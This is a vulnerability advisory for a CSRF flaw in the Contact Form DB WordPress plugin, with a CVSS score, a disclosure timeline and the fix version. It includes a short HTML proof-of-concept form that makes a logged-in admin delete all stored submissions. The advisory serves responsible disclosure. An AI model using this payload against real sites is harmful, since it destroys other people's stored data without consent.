CSRF in Contact Form DB allows attacker to delete all stored form submissions

Vulnerability

Last revised: February 17, 2015

An attacker able to convince a logged in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	4.3 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	None
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

If a logged-in administrator user clicks the submit button on this form, all records stored by the plugin will be deleted (in a real attack the form can be made to auto-submit using Javascript).

<form action="http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions" method="post">
  <input name="all" type="text" value="y">
  <input name="delete" type="text" value="y">
  <input type="submit">
</form>

Advisory timeline

2015-02-05: Discovered
2015-02-17: Reported to vendor by email
2015-02-22: Vendor responded and agreed a schedule for fix
2015-02-23: Vendor published a fix in version 2.8.32
2015-03-04: Advisory published

Mitigation/further actions

Upgrade to version 2.8.32 or later

dxw advisories

Advisory: